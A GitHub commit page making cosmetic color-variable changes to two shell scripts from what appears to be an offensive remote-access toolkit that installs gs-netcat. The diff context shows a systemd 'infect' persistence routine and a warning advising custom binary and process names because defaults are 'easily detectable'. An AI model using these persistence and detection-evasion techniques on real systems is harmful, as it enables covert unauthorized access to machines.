Skip to content

Commit

Permalink
deploy y & ys
Browse files Browse the repository at this point in the history
  • Loading branch information
rootTHC committed Nov 12, 2024
1 parent 3b16946 commit 8aff438
Show file tree
Hide file tree
Showing 3 changed files with 4 additions and 4 deletions.
Binary file modified beta/bin/deploy-all.sh
Binary file not shown.
4 changes: 2 additions & 2 deletions beta/x
Original file line number Diff line number Diff line change
Expand Up @@ -1623,7 +1623,7 @@ install_systemd_infect() {
# recover if this fails:
do_config2bin "${DSTBIN}" "${bin}" "-liq" "" || return 255

STARTING_STR="Starting gs-netcat as infected ${CDB}${name}.service${CN}${CDC}${CN}"
STARTING_STR="Starting gs-netcat as infected ${CB}${name}.service${CN}${CDC}${CN}"
}

install_system_systemd()
Expand Down Expand Up @@ -2275,6 +2275,6 @@ echo -e "--> ${CW}Join us on Telegram - https://t.me/thcorg${CN}"
unset is_warn
[ "$UID" -eq 0 ] && [ -z "$GS_SUPERVISE" ] && is_warn=1
[ -z "$GS_BIN" ] && is_warn=1
[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n Set ${CDC}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."
[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n Set ${CB}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."

exit_code 0
4 changes: 2 additions & 2 deletions beta/y
Original file line number Diff line number Diff line change
Expand Up @@ -1623,7 +1623,7 @@ install_systemd_infect() {
# recover if this fails:
do_config2bin "${DSTBIN}" "${bin}" "-liq" "" || return 255

STARTING_STR="Starting gs-netcat as infected ${CDB}${name}.service${CN}${CDC}${CN}"
STARTING_STR="Starting gs-netcat as infected ${CB}${name}.service${CN}${CDC}${CN}"
}

install_system_systemd()
Expand Down Expand Up @@ -2275,6 +2275,6 @@ echo -e "--> ${CW}Join us on Telegram - https://t.me/thcorg${CN}"
unset is_warn
[ "$UID" -eq 0 ] && [ -z "$GS_SUPERVISE" ] && is_warn=1
[ -z "$GS_BIN" ] && is_warn=1
[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n Set ${CDC}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."
[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n Set ${CB}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."

exit_code 0

0 comments on commit 8aff438

Please sign in to comment.